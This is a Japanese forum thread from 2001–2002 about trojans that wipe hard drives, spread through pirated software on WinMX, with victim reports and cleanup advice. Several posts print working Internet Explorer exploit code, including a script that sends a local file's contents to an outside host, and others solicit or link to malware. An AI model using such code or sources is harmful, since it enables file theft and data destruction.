そんなむつかしいことをするより、フリーソフトで探したらいくらでもあるのに。

661 :656:01/12/02 23:02
>660
できればそのフリーウェア教えていただけませんでしょうか。
探してはみたのですが、よくわかりませんでした。

662 : :01/12/03 14:20
金払うなら、ターミネーターアルティメットでも買うんだな。
日本語だ。

663 :名無しさん@お腹いっぱい。:01/12/04 14:17
test

664 : :01/12/04 15:33
FinalData使ってみて、フォーマットしても
これだけデータが残ってるんだなあ、と実感した。
安い中古パソコンとか中古HD買って覗いてみたくなったよ

665 :名無しさん@お腹いっぱい。:01/12/06 13:25
>664
コワ!

666 :名無しさん@おなかいっぱい:01/12/06 22:28
>>664

やったことあるよ。
自動車中古販売のお店で使用していたようで、
顧客管理しているTheCardのファイルを吸い出した。
あと、お金関係のエクセルファイルとか。

667 :名無しさん@お腹いっぱい。:01/12/06 23:02
まぁ、面白いものが入っている可能性はほとんど無いだろうな。

668 :名無しさん@お腹いっぱい。:01/12/07 00:44
846のものなのですが、インストールもできないのです。
メールも同様、インターネット以外は何もできません。

SirC32exeがみつかりません。
このプログラムは種類が アプリケーション のファイル
を実行するために必要です。

と画面に出てきて、SirC32exeを検索してもどこにもないのです。
なんとか方法はないのでしょうか?

とにかく、タスクの欄がインターネット、文字とタスクスケジューラーしか
表示されていませんし、どうすることもできません。

もしくは、どこかにきいてみればいいよ、とか
このサイトならきっと解決できるよ、などといった
情報がありましたら、ぜひ教えてください。

669 :よくわからん! :01/12/07 01:03
こんな内容の php スクリプトを用意し、
<?php
Header("Content-type: application/octet-stream");
Header("Content-Disposition: attachment; filename=calc.exe");
readfile("calc.exe");
?>

これを readme.txt という名前で保存する。で、AddType application/x-httpd-php .txt する。で、IE からアクセスしてみる。

 IE 5.01 SP1 や IE 6 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルを
コンピュータに保存するか選択してください」というダイアログが出る。で、「開く」と答えると、今度は「次のファイルをダウンロードしています - calc.exe -
ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出る。これは正常だ。

 ところが、IE 5.5 SP2 からアクセスすると、「次のファイルをダウンロードしています - readme.txt - ファイルを開くか、ファイルをコンピュータに保存するか選択してください」というダイアログが出たときに
「開く」と答えると、いきなり calc.exe が実行されてしまうのだ。あな恐しや。手元では IE 5.01 SP2 / 5.5 SP2 / 6 on Windows 2000 SP2 で確認した。

 実験したい人は http://www.st.ryukoku.ac.jp/~kjm/test/readme.txt にアクセスされたい。ここでは calc.exe ではなく lhasa016.exe になっている。

670 :事後報告:01/12/16 06:56
LightWave7.0 日本語版(28M前後)だったと思う。
↑を落として解凍したら、中にはいくつかのフォルダ
(ちなみにこのフォルダのひとつの中には動作可能な6.5が入っていた)と
setup.exe(たしか25k)があった。
で被害状況としては、setup.exeを実行した途端にデータの消去が始まって
ファイルのみ全部消えていくというもの。
実行したらHDDガリガリ鳴りはじめて、動作も重くなったから
タスクマネージャー(プロセス)でしらべてみたらsetup.exeがCPU100%近くなってて。
やばいな〜と思ってソッコーでプロセス終了させて。
おそらく数秒の間だったと思うんだけど結構ファイル消されててさ。
まぁいつかこんなこともあるだろうと思って、たいしたファイルも置いてなかったからよかったんだけど。
ちなみその時(フォーマット時)ルートに「xyz(拡張子なし)」とかいうファイルが生まれていて
中身を見てみたら、「You did a piracy, you deserve it」って書いてあった。
初めての事だっったから、どうなるのか最後まで見てみたくてもう一回setup.exeを実行してみた。
大量にあるファイルがガシガシと亡くなっていくのを見ていた。
で、そのままOS再インストールして気になって調べてたらココを発見したというわけです。
一通りこのレス読んでみたんだけど、既出と違う点は
setup.exeを実行したとたんにフォーマットが始まるということ。
亜種かな?どうなんでしょう。
長レススマソ、初めての日の夜だからさ、興奮してて寝れなくてさ。

671 :名無しさん@お腹いっぱい。:01/12/16 10:24
>>670
そりは恐ろしい

672 :名無しさん@お腹いっぱい。:01/12/16 10:37
わしの友人がMXでWhistler食らったようなので報告。
何故かProgram Files内のファイルは全部無事。あとデスクトップ上に
置いてあったDocファイル2個の内1個が生き残った模様。
(一応ノートン入ってたみたい)
AudioMagicとやらを入れた後に再起動したら・・と言っていたが
他にも短期間でたくさんインストールしてたみたいでなにが怪しいかわからんようです。
解凍に失敗したのもあったらしいし。
役に立たなくてスマソ。

データはみんな別のPCにあるからへっちゃらとか言ってこりてない様子。
Windowsの再インストールが面倒だったと言っていたが。

673 :名無しさん@お腹いっぱい。:01/12/16 11:05
>>670
亜種じゃくて、そのものだよ。
過去ログ全部読んだ?
28MB前後のLW7に入っているのは有名な話。
というか俺もそれにやられた(8月頃)。

ちなみに、入っているのはちゃんとしたバージョン7だよ。
HV3のスプライトモードなど、7の新機能も入っていたし。

674 :名無しさん@お腹いっぱい。:01/12/16 11:06
>>670
ごめん、良く読んだら、再起動前に始まるのね・・・
だったら亜種だね。
恐ろしいね。

675 :名無しさん@お腹いっぱい。:01/12/23 07:59
>644
Linuxで遊ぶ為のサブPCとして中古PCを買ってきたんですよ。
インストールする前にFinalDateでHD見てみたら病院のカルテが
数GBあるんだけどぼくはどうしたらいいと思いますか?

ちょっと衝撃でした。

すれ違いスマソ。

676 :675:01/12/23 07:59
>664
の間違いです

677 :名無しさん@お腹いっぱい。:01/12/24 06:30
さがりすぎてるのであげとく

678 :名無しさん@お腹いっぱい。:01/12/24 07:07
>>675
欲しいざんす。

679 :擬人:01/12/24 18:07
凶悪ハッキングについてこレだろ。
http://www.puchiwara.com/hacking/hacking.html

680 :名無しさん@お腹いっぱい。:01/12/24 18:55
>>593 >>601
う〜む。はじめてこのスレ全部読んだんで、激亀レスなんだが…
Wingroove事件のあれは作者の「故意」なのは当然なんだけど
結局作者氏は「事故」で通してしまったな。たとえ相手がM$社でも
「事故」だと主張されたら騒ぐ程度しかできん。

このスレの大方の住人には悪いが、俺、割れはやらんので
事件当時はWingroove作者側を応援しとったんよ。
いっそ「不正発見したらHDD消去が当然」のコンセンサスが
出来あがったらよいとさえ思ってた。全部のシェアウェアに
そういう機能をいれてくれと…。いや誤動作の可能性も承知だが。
んなこというとこのスレの住人からは狂人扱いされそうだが…、
正規ユーザが不正ユーザに対しての「明確なアドバンテージ」を持つ
としたらこういう形しか無いと思っとったんだ。

けど、結局あのWingrooveの作者あざらし氏も、保身からか
「事故」で通してしまったのを見て、応援する気なくしたよ。
結局作者自身も「悪事」を働いてるって自覚しとったんだと。
巧妙に潜伏期間をおいて、OSのシステムファイルIO.SYSの仕業にしたて、
自分に疑いが掛からないようにして、もう悪意たっぷりだったと。
性根はウイルスの作者と大して変わらんのだと…。

しかしこれはP2Pの無かった時代のことなんで、改めてP2P時代の
割れが入り乱れた状況を考えると、製作者側の報復装置としては、
似たようなアイデアは幾らでも出てきそうな気がするんよ。
「テロ支援国家には正義の報復攻撃を」なんていう恐ろしい感覚を、
多くの先進国が支持してる時代だ、絶対過激なのも出てくる。
あ〜説教臭く聞こえたらすまん。でも、ほんとそういう気がする。

681 :名無しさん@お腹いっぱい。:01/12/24 19:02
>>680
>巧妙に潜伏期間をおいて、OSのシステムファイルIO.SYSの仕業にしたて、
>自分に疑いが掛からないようにして、もう悪意たっぷりだったと。

え、そんな凝った仕組みだったの?本当ですか?

682 :680:01/12/24 19:14
当時、議論がさかんだった時に実験した人の、
ニュースグループでの発言では…

不正尻有を入れて、次回再起動した時点でIO.SYSが書き換えられて、
ある程度の日数(8日?)を置いて、その改変IO.SYSがHDDのFATを
0クリアする…というものだったはず…。

683 :名無しさん@お腹いっぱい。:01/12/24 19:18
>>682
そうなんですかー。
なんか嫌な感じですね。
シリアルを1文字間違えたりしてもダメなんですか?

684 :名無しさん@お腹いっぱい。:01/12/24 19:20
  ★     ☆・。
       ☆☆   ・
      ☆☆☆  ☆  ・★
      ☆☆☆☆
     Merry Xmas ・.☆
     ☆☆☆☆☆   ・:☆
     ☆☆☆☆☆☆
    ☆☆☆☆☆☆☆    ☆。・☆:
        ||
       HHHHHHH  

685 :680:01/12/24 19:27
>>682
 ↑ごめん。
不正尻有入れてある程度(2ヶ月?)の日数を経て、
さらにMIDI再生を行った日数が8日目に達して始めて、
OSの終了時にIO.SYSを改変→再起動後FAT消去
だったようだ…。

686 :680:01/12/24 19:34
>>683
あ、ちなみに不正シリアルってのは、
割れサイトで公開されてた(元は正規の)シリアルなんで
「間違ったシリアル」って意味じゃない。

687 :C ◆narLqamA :01/12/25 03:45
あのー宜しければどなたか私にウイルスを送って頂けませんか。
ネットを始めて6ヶ月になるのですが、まだウイルスというものを見たことがないのです。
メールはプレビューoffにしていますし、メアドは学校の園芸部のものになりますから万一爆発しても大きな心配は要りません。
必ず厳重に扱いますので宜しければ、幾重かに圧縮された上で上記アドレスにお送り頂ければ幸いです。

688 :名無しさん@お腹いっぱい。:01/12/25 05:55
>>687
捕まるよ。

689 :名無しさん@お腹いっぱい。:01/12/25 10:27
>687
MX

690 :名無しさん@お腹いっぱい。:01/12/25 11:26
>>687
[charbeljapan]で検索するといろいろ出てくるね。
スパム食らった人?くだらない報復は止めてniftyに陳情でもしたほうが効果的じゃない?

691 :ななし。:01/12/27 02:43
このスレで良いのかな?

落としてはいけないリストのサイトで書き込みがなかったので、一応情報。

【アプリ】 アダルトゲームのモザイクを外すユーティリテイ集(1).zip
サイズ (私の手元のプロパティから)171,729バイト

友達経由(その友達はMXでダウソ)でもらったので私は直接MXからダウソしてません。

自動ウイルススキャンで、ALICE_T1.exeの中から、W95.Hybris.worm
みっかりましたので、ご報告まで。

692 :名無しさん@お腹いっぱい。:01/12/27 03:41
アンチウイルスソフトは
ノートンとバスターどっちがお奨め?
一応バスター2002は2001持ってるから無料で使えるけど
なんか重くて・・・・

693 :名無しさん@お腹いっぱい。:01/12/27 12:32
遅ればせながら件のウィルスにかかってしまったようだ。しかも2回。
どうやら原因は直前にMXで落としたFinaldataとみてほぼ間違いない。
ただしデータそのものはFinaldataで完璧に復活できた。
OSはWin2k。

694 :名無しさん@お腹いっぱい。:01/12/27 16:31
>693
ウイルス入りのファイナルデータで、データ復活?

でもウイルス感染したままの状態で復活ってこと?
説明キボヌ。

695 :名無しさん@お腹いっぱい。:01/12/27 17:17
カビキラーにカビが生えちゃったみたいな喜劇だな(藁

696 :名無しさん@お腹いっぱい。:01/12/27 23:19
FINALDATAは悪魔のtoolです。MXよりコワイ。お薦めできない。

697 :名無しさん@お腹いっぱい。:01/12/28 00:11
>>695
ワラタよ

でも、この場合「カビの生えたカビキラー使っちゃった」だな。。

698 :693:01/12/28 03:09
まず、別に必要はなかったが戯れでFinaldataを落としてみた。
いろいろやって再起動したら発症したので、すぐにOSをクリーンインスト。
で、よせばいいのに再びMXでFinaldataを落としデータを復旧、バックアップを取る。
そのFinaldataも感染していたらしく、再起動でまた発症、というわけさ。

699 : :01/12/28 05:17
もらったカビキラーにカビが生えてそのカビをごまかす為に
カビのカビキラーを使ったらまたカビた????

ゴメソ。意味不明。 

700 :名無しさん@お腹いっぱい。:01/12/28 07:39
良かったな、いい経験だ

701 :名無しさん@お腹いっぱい。:01/12/29 01:47
なんだか DOM防止パッチ2.65 あたり か
napgaiterだっけ? この二つのどちらかわからないが実行したら
再起動後 逝きましたわ HDD 全部 フォルダだけ
で 終了したら 再起動不能....

かなり貴重なファイルやメール、お気に入り.....
いままでの環境を再構築と考えただけで最悪です。

みなさん、気をつけてください

702 :名無しさん@お腹いっぱい。:01/12/29 03:07
NortonGhost2002 日本語版 要注意

703 :名無しさん@お腹いっぱい。:01/12/29 04:05
>>702
もうちょっと詳しく…

704 :名無しさん@お腹いっぱい。:01/12/29 05:10
中身は 2001です。readmeみると2001と記述してあり、
で、もしかしたら中身は2002かななどと思い
ウィルスチェック後、共有ファイルが偽物じゃ悪いと思い
中身確認のためインストーラーをちょっとでも起動したりするとひっそりッドスネークします。
気づかずに再起動後した場合、あなたのminePCは 白痴になります。

千と千尋の 顔なし が 急増中
金が土に変わる前に活用するべし....

705 :693:01/12/29 13:52
>>704
とてもウィットに富んでますね。何かいいことでもあったんですか?

706 :名無しさん@お腹いっぱい。:01/12/29 15:13
>>705

べつに . . . .

707 :名無しさん@お腹いっぱい。:01/12/29 16:21
>>704
なんだか詩人ですね。
もっと詳しいレポート希望。

708 :名無しさん@お腹いっぱい。:01/12/29 22:16
今しがたWinSvc.exeにやられた。
うおー!データパーティションが空だぜー。
全滅はまぬがれたが
MSCONFIGしとけよ俺。

ハイテンション欝。

709 :aoo:01/12/29 22:19
これはどうですか?
http://makaroni.free-city.net/index.html

710 :名無しさん@お腹いっぱい。:01/12/29 22:25
>709
氏ねやヴォケ

711 :名無しさん@お腹いっぱい。:01/12/29 22:48
>>709
マルチポストしまくりだな。
まぁ二度とここ読まないだろうけど。

712 :名無しさん@お腹いっぱい。:01/12/29 23:29
なっち…
Finaldataに助けもとめて
さらにそれでまたやられると
ダメージきついな。

713 :132:01/12/30 01:01

WinGrooveの他にFileVisorとかもやばくないか?

と言うか俺も8月ぐらいにHDDのデータ吹っ飛ばされたよ。

症状は同じ。フォルダ残して真っ白。
まぁ、Whiterの仕業とわかっただけでも良かった。

ちなみに俺のときは確かATOK14だったかな?
それ開いた瞬間にDOSが起動してOSハング⇒再起動⇒撃沈
OSが2000だったからなんかおかしいと思ったが割れ物だしあんまり騒げなかったので鬱だった。

ちなみに吹っ飛んだデータ 40GBのHDD×2=80GB.....。

吹っ飛んでから2週間は立ち直れなかった・・・。

二度と体験したくは無いな・・・。鬱

714 :名無しさん@お腹いっぱい。:01/12/30 01:10
>>704
もっと詳しく

715 :名無しさん@お腹いっぱい。:01/12/30 01:11
>>713
俺は60G+60G+ネットワーク上の60G+60Gで
240GB飛んだよ。ショックだった・・・・

716 :f-tokyo-150185-l3.zero.ad.jp :01/12/30 01:21
guest guest 

717 :名無しさん@お腹いっぱい。:01/12/30 06:49
うお〜いっ!!さっきファイル確認してたら
whisterとwhistler発見した!
ファイルの名前は
Adobe Premiere6.0とウインドウズXP
既出だったらスマソ!

718 :名無しさん@お腹いっぱい。:01/12/30 16:31
28日に感染しました。
MXでインターネットサムライを落として、起動。
フリーズ→再起動後HDDのアクセスが異常にあった。
1の通り、フォルダを残して中身は空っぽ。
program filesだけは無事。
卒業論文のデータがあぼーん。
鬱氏。

719 :名無しさん@お腹いっぱい。:01/12/30 16:32
Norton Utilities 2002J(fcd).zipってのを解凍したら
Download4\NortonUtilities2002当該{語版\NortonUtilities2002日本語版
という具合にフォルダが作成されて、フォルダが消せない症状が出ました。
(リネームも何にもできない)
その後、再起動でHDDあぼーん。

ノートンはインストールしてないのにトロイ仕込まれるのって
あるんでしょうかね?

720 :名無しさん@お腹いっぱい。:01/12/30 16:39
WinSvc.exeを調べてみたところ、奇数月の13日にHDD全消去プログラム
が作動すると書いてあったが、↓
http://japan.ahnlab.com/virusinfo/view.asp?seq=85&pageNo=5

俺が被害にあった日は12/29でした。
亜種かな。

721 :名無しさん@お腹いっぱい。:01/12/30 17:17
つーかMXで逮捕者が出た今でも、アプリを共有している無謀な奴はいるんだねぇ。

722 :みやむ:01/12/30 18:00
すいませんが、質問お願いします。
友達がWinMxを使ってDLしまくってると言ってるんですが、私はやばいからやめとけ、
そういったのですが、「大丈夫、DLはいいんだよ」といってるんです。
DLしても大丈夫なら、私も試してみようかと思ってるんですけど、DLするのは危ないんでしょうか?
ちなみに友人は曲メインで落としてるらしいです。

723 :名無しさん@お腹いっぱい。:01/12/30 18:31
>>722
スレ違いです。MXのスレに行きましょう。

724 :名無しさん@お腹いっぱい。:01/12/30 22:34
>>722
共有するのが公衆送信権というのにひっかかってタイーホされる。
共有無しで落とすだけなら大丈夫だが、DOMで低速回線ならMP3でも弾かれるよ。

725 :名無しさん@お腹いっぱい。:01/12/31 03:12
WinRAR 290日本語をDL。
添付のテキストに丁寧に書かれていた通りにインストール。
見事にWhiter埋め込まれて次の起動でHDのデータ全部あぼーん。

726 :名無しさん@お腹いっぱい。:01/12/31 07:04
自分で買ったCDRドライブについてたWinCDRのCDを無くしてしまったので
昨日落としてインストールしました。
ver6.0です。 今このスレを今はじめて見てすごく怖くなったのですが
再起動しても消去されてなければ大丈夫でしょうか?

727 :名無しさん@お腹いっぱい。:01/12/31 07:16
WinCDRはマジでヤバイ!俺の友達もやられた。特に6が危ないそうな。
ウィルススキャンしてみ。
あとStartStop入れて数日は確認しないとね。

728 :名無しさん@お腹いっぱい。:01/12/31 07:20
Symantec
http://www.symantec.com/region/jp/securitycheck/

StartStop
http://www.tfi-technology.com/startstop.htm

数日後にあぼーんってこともあるらしいよ。

729 :726:01/12/31 07:25
まじっすか?普段割れなんてしないのにCD探すのがめんどいって理由で
唯一落としたのでヒットか?
Whiterって単語を検索したところなかったんだけどやばい?
寝れねーー

730 :726:01/12/31 07:27
>>728
とりあえずオンラインスキャンしてみる

731 :名無しさん@お腹いっぱい。:01/12/31 07:29
今のうちにバックアップ取っとけ。

732 :名無しさん@お腹いっぱい。:01/12/31 07:31
最近じゃ何にでも入ってるよ<ウィルス

733 :726:01/12/31 07:33
Symantecでオンラインスキャンして問題なければ大丈夫ですかね?
今途中なんですけど

734 :726:01/12/31 07:35
今スキャン中なんですけどすでに感染ファイル1って出てます・・・

735 :名無しさん@お腹いっぱい。:01/12/31 07:37
ここはMXやってる奴が自分の自業自得を語るスレ?

736 :名無しさん@お腹いっぱい。:01/12/31 07:39
レジストリを見てあやしいスタートアップが無いか確認すれば良いじゃん。
単にそれだけの話。意味も無く怖がるな。

737 :名無しさん@お腹いっぱい。:01/12/31 07:43
>>736
レジストリじゃなくてもmsconfigであやしいスタートアップがなければ大丈夫?

738 :名無しさん@お腹いっぱい。:01/12/31 12:46
2度と再起動しなければ多分大丈夫!

739 :名無しさん@お腹いっぱい。:01/12/31 13:02
ぜんぶ隠しファイルにしとけば多分大丈夫!

740 :2チャンネららら:01/12/31 13:11
たいへんねぇ。

はにちゃんねるをよろしく。
http://www.isn.ne.jp/~honey/hc/

741 :名無しさん@お腹いっぱい。:01/12/31 14:16
>>737

君、ニュータイプじゃなようだね
いつも、スカウターをつけてるようだし。
電子レンジにでもなっちまえ!!

742 :糞レスばっかだな:01/12/31 14:27
     

743 :日清 ラ王:01/12/31 14:49
>>742
ふん! おまえは所詮、ニュータッチ の箱売り娘。

744 :名無しさん@お腹いっぱい。:01/12/31 20:40
Virtual PC使えばいいじゃん。前イメージをコピーするだけで復旧できるし。
最近は Virtual PC自体にウイルスがついているので体験版を落としてきて
パッチを当てるのがお勧め。

もっとも、Virtual PCが一番役に立つのは 自作のウイルスの実験台
にする場合だけどな(BIOS破壊は除く)。

745 :名無しさん@お腹いっぱい。:01/12/31 22:27
やっと流行おくれのTROJ_WHITER.Cを入手しました。
クリスマスプレゼントは、できなかったけど、
お年玉は、みなさんに差し上げます。
来年も良いお年を・・・

746 :2002年:02/01/01 01:44
あけましておめでとう!
オイラも、いっぱいバラまいちゃった。
一富士、二鷹、三なすび、起きてビックリ玉手箱になるでしょう。

747 :名無しさん@お腹いっぱい。:02/01/01 03:15
>>745-746
( ´_ゝ`)フーン

748 : :02/01/01 10:20
745と746が捕まった時の顔といったら・・・(ププ

749 :Trojan:02/01/01 20:40
ウイルスを自作できる744も危ないヤツだな!
自作できないワシは、コレクション専門だ。
30種類以上集めたが、ほとんど古くて使いもんにならん。
今のところ「W32.Whiter.Trojan」の亜種が最強だな。
ウイルスって、検索すれば簡単に見つかる。
ここに来た人の中にも、入手しているヤツが、かなりいるハズだ。
不況が、犯罪をネズミ講のごとく広めている。

750 :名無しさん@お腹いっぱい。:02/01/01 20:49
再起動の前にレジストリーをみるべしと書いてるけど
どこをみればいいの?

751 :名無しさん@お腹いっぱい。:02/01/01 21:18
ていうかこのスレに載ってるし。俗に言うガイシュツってやつだ、君。

752 :名無しさん@お腹いっぱい。:02/01/01 21:20
PCに詳しくないからわかんないんだよ
例えば c:\WINNT\system32\whismng.exe でPC内を検索とか
する事なのかな?

753 :>749 ウイルス差し上げます!:02/01/01 21:26
http://www.ebcvg.com/vx_exe.html

リンクをたどるとまだたくさんある。

754 :749じゃないが:02/01/02 10:46
>>753
おお!サンクス。
ちなみにWhiter欲しいんだが見つからん...

755 :たのむ:02/01/03 00:43
見つかれば教えてください。
「W32.Whiter.Trojan」と「ニムダ」が合体したようなウイルスは?
つまり、メールで伝染させてハードディスク全消去してしまうウイルス。
きっと、あるはずだ。 ほしい・・

756 :名無しさん@お腹いっぱい。:02/01/03 03:16
>>755
そんなウィルスがあったらおそろしすぎる。
でもありえなくはないんだよな…
(((( ;゚Д゚)))ガクガクブルブル

757 : :02/01/03 04:10
かなり執拗に捜査されるだろうね。
捕まって名前晒されて祭り。
損害賠償とかも大変そう。

758 :名無しさん@お腹いっぱい。:02/01/03 04:37
ウイルスバスターの尻おせーて

759 :名無しさん@お腹いっぱい。:02/01/03 05:11
ω

760 :名無しさん@お腹いっぱい。:02/01/03 06:23
サーカムだよそれ

761 :名無しさん@お腹いっぱい。:02/01/03 06:25
スマソ。マチゲータ。昔のはなししてたと思って待った

762 :名無しさん@お腹いっぱい。:02/01/03 14:18
>>758 ほれ
SJF-9999-7385-8479-9082
ただし、最初の一文字が抜けてるよ 自分で探そう!

763 :744:02/01/03 15:55
>>755
あのなぁ。
W32.Whiter.Trojanとニムダ手に入れてソース見ればいいだろ?
改造の具合によっては最強の物ができるぞ。

おれもニムダの変種を作ったことがあるが、そのまま流用したんで
ウイルスチェックに引っかかってしまった。まだまだですな。

764 :名無しさん@お腹いっぱい。:02/01/03 20:59
エボラウイルスはすぐに発病して被害も大きいから一時的には大惨事に
なるけど逆に人類に絶大な被害を与えることもないそうな。
エイズウイルスは潜伏期間が長いので

765 :初心者:02/01/06 00:44
「MX 落としてはいけない物リスト」のサイトは、
閉鎖ですか? それとも更新中ですか?

766 :初心者:02/01/06 06:22
ちゃんと ありました。

767 :名無しさん@お腹いっぱい。:02/01/06 17:46
漏れも昔やられた。MXは入れてたが何でなったかはわからん。
起動できなくなったのでスキャンディスクをかけたところ、
33バイトのFile****.chkや、Dir****というディレクトリが作られてた。
結局このファイルを修復する方法はないの?

768 ::02/01/08 00:04
画像ファイルがすべてなくなりました。二日前くらいに。
それに気付いて他にも確認したんですがどうやら画像のみの被害でした。
フォルダはそのままのこっていました。空のですけど。
そのときにはまだ動画ファイルはちゃんとあったと思います。
メールは確認してませんでした。
オンラインスキャンもしましたがなにも検出されず、ウィルスではないのかな、
とおもっていたら次の日、今度は動画ファイルがすべてなくなっているんです。
「昨日はあったのに!」と思い、またスキャンしたけどなにもなしでした。
いままでのメールも全部なくなってしまいました。なにが原因でしょうか?
数日前からパソコン起動後(1分後位)にFDDのアクセス音がきこえました。

769 :名無しさん@お腹いっぱい。:02/01/08 12:06
>768
おそらく「Wininits.exe」の仕業ではないかと。
「初心者質問スレッド」の450あたりからその話題が出ています。
応急処置は
http://pc.2ch.net/test/read.cgi/sec/1008322606/475
で。
はい、あのスレの464です。

スタートアップ監視ソフトの正式名称、忘れた・・・
「Start and Stop」で合ってたかな?

770 ::02/01/08 14:10
>>769
「.exe」で検索したらそれありました。
でもテキストファイルはのこっていますし消えたのは
画像、動画、メール、htmlファイルなどです。
画像ファイルにもいろいろありますが、残ってたのはPNGのみで
あとは全て消えました。動画もMPG(?)とavi,が全部消え、残ったのは
MP3,ASF,rmなどです。メールはOutlook Express へようこそだけ、
というよりは初期化?されたかんじです。
いまさらなにがなくなっても驚きませんが原因がわからないと
また同じことですので。
応急処置はしませんが、そのうちリカバリCDで最初からの状態にします。
みつかったexeファイルは削除しちゃいました。これはもう根付いているんでしょうか?
なにかわかったら教えてください。

771 :名無しさん@お腹いっぱい。:02/01/08 20:38
>>768
うちと似てるかも。
やっぱり数日前からPC起動1分後位にFDDにアクセスしてたし。
あとWINが立ち上がった瞬間に電源がいきなり落ちたり、起動した直後にHDにアクセスしたまま
固まったりちょっと挙動が怪しかったんでウィルスを疑って全ドライブスキャンしたけど異常は無し。
リカバリする事にして、ファイルのバックアップをしようとしていた矢先の事でした。
ハードディスクの空き領域がやけに増えていたんですよ。
データを保存してた場所は Dドライブ内に MyDocuments と Desktop、Eドライブ、Fドライブ。
調べてみるとMyDocumentsとEドライブで空のフォルダを残して jpg gif mpg avi txt html がごっそり
なくなってました。残ってたのは mov mp3 rm png psd mht アーカイブファイル等です。
ここ見る前にリカバリしちゃったんだけど、これも「Wininits.exe」の仕業ですかね?

772 :名無しさん@お腹いっぱい。:02/01/09 00:03
>771
http://pc.2ch.net/test/read.cgi/sec/1008322606/601-700
このあたりでも(616以降)話題になってる。
案外、深刻なんじゃないのか?静かなブームになるかも。

773 :名無しさん@お腹いっぱい。:02/01/09 00:34
c:\WINDOWS\Temporary Internet Files\Content.IE5\OX2NGTIZ\l50[6] は 次のウィルスに感染しています: JS.KakWorm.Z
どうすりゃいいのさ?

774 :名無しさん@お腹いっぱい。:02/01/09 00:59
<!--ipt
a=GetObject("c:\\test.txt","htmlfile");
setTimeout('window.open("http://tarikihongandou.shadowpenguin.org/WinSec/tarilog.cgi?name=test&chat="+a.body.innerText);',2000);
</scri-->

775 :名無しさん@お腹いっぱい。:02/01/09 01:11
なにこれ?

776 :名無しさん@お腹いっぱい。:02/01/09 01:33
>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン(?)良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる(w
・・・IP晒してろぐる事ないぢゃんかよぅ。。

777 :名無しさん@お腹いっぱい。:02/01/09 01:35
>>774
ああ。
グニンスキーちゃんの見つけた最新バグ
IE GetObject() problemsね。
しかし、あのオッサン(?)良く見つけるね。。。
>>775
一回、本人のサイト探して逝ってみると良いよ。
少なくともマイ糞TechNetよりは為になる(w

・・・これ、ログってんの??IP晒す事無いと思うけど。。

778 :777:02/01/09 01:39
なんてこった。。
間違いカキコでラッキーNoゲット。。

779 :>773:02/01/09 02:27
http://pc.2ch.net/test/read.cgi/sec/994847789/173-182

780 :GetObject:02/01/09 02:30
An example of the malicious code has been provided by Georgi Guninski <guninski@guninski.com>:

a=GetObject("http://"+location.host+"/../../../../../../test.txt","htmlfile");

http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3767

781 :JavaScript Local File Enumeration Vulnerability:02/01/09 02:33
http://www.securityfocus.com/bid/3779

<html>
<head>
<script language="javascript">
<!--
var fileExists = false;
function yes()
{
alert("the file exists.");
yes = true;
}

function no()
{
if(!fileExists)
{
alert("the file does not exist.");
}
}

window.onerror = yes
window.onload = no
//-->
</script>
<script language="javascript"
src="file://c:\autoexec.bat"></script>
</head>
</html>

782 :名無しさん@お腹いっぱい。:02/01/09 10:51
>>769
"StartStop"ね。ググルで検索すれば一発で見つかるよ。

783 :名無しさん@お腹いっぱい。:02/01/09 18:53
>783
感謝です。

784 :782:02/01/09 19:49
>782
サンクス! 上の783のぶんまで感謝します。

785 :名無しさん@お腹いっぱい。:02/01/10 20:25
VMWare3.0 でHDD逝きました。
確か容量が13M以内だったと思います。
インストール直後はいいのですが
インストールが終わって再起動します。
そうすると、HDDが徐々に削除されていきます。
ネットワークに共有を加えている方は、
そのファイルまで消えます。
フォルダだけ残してすべて・・・・・・・

皆さん気をつけてください。

漏れの40Gのファイル達がぁぁぁぁあ!!
CPU早かったせいか・・・1分程度で消えました・・・・

786 :名無しさん@お腹いっぱい。:02/01/10 21:53
だからVMwareはオフィシャルサイトから落とせるっつーの。
わざわざMXで落とす奴がバカ

787 :名無しさん@お腹いっぱい。:02/01/10 22:35
786>
MXとは一言も言ってないと思われ・・・・

788 :名無しさん@お腹いっぱい。:02/01/10 23:10
ではオフィシャルサイトで配布してるVMwareにWhiterウィルスが感染してたと?

789 :名無しさん@お腹いっぱい。:02/01/10 23:28
知り合いからいただきました。

790 :名無しさん@お腹いっぱい。:02/01/11 11:01
ならその知り合いを頃しちゃいましょう。

791 : :02/01/12 12:04
ちょっとスレと関係ないんですけど、
RMファイルって見てるだけでブラウザを任意のサイトへ
飛ばすことって出来ますよね?
実は有料サイトの動画を見ていたら、勝手にブラウザが
そのサイトのトップページに飛ぶのですが、
これは、ウイルスへのリンクとかブラクラへのリンクを
仕込むことが可能ということですよね?

792 :名無しさん@お腹いっぱい。:02/01/12 16:29
年末にトロイにHDDをずたずたにされたおかげで心機一転再フォーマットしたら
不良クラスタが減ってしまいました

793 :名無しさん@お腹いっぱい。:02/01/12 17:34
>>791
できるね。
ちゃんとIEのセキュリティパッチをあてておかないと危険

794 :名無しさん@お腹いっぱい。:02/01/12 19:29
ヨシ!
コレデマタfinaldataガウレルゾ
イヒヒヒヒ

795 :名無しさん@お腹いっぱい。:02/01/12 19:42
↑てことはないよね。

796 :名無しさん@お腹いっぱい。:02/01/12 20:48
だってWhiterで破壊されたファイルはFinalDataで復旧できないじゃん。

797 :名無しさん@お腹いっぱい。:02/01/12 21:58
ハァ?

798 :名無しさん@お腹いっぱい。:02/01/12 22:36
>>797
ハァ? 、とか言う前に、このスレ全部読んでみたら?
わかってないの君だけ。

799 :名無しさん@お腹いっぱい。:02/01/13 08:11
プゥ?

800 :age:02/01/13 09:10
age

801 :名無しさん@お腹いっぱい。:02/01/13 09:44
マァマァ、落ち着けよ

802 :名無しさん@お腹いっぱい。:02/01/13 10:20
(゚Д゚)ウボァー

803 :名無しさん@お腹いっぱい。:02/01/13 12:37
先生我々は遂に
アフォの797をハケーソしました。
がなにか

804 :名無しさん@お腹いっぱい。:02/01/13 13:00
わたしもやられました。
・まず、年末にhtmlファイルがすべてなくなっていた。
・FDへの意味不明のアクセスが毎起動時にあり。
・今年に入って、GIF、JPGの全消失。
・MPG、AVIの消失。
・HLPファイルの消失。
・SCR(スクリーンセイバー)の消失。
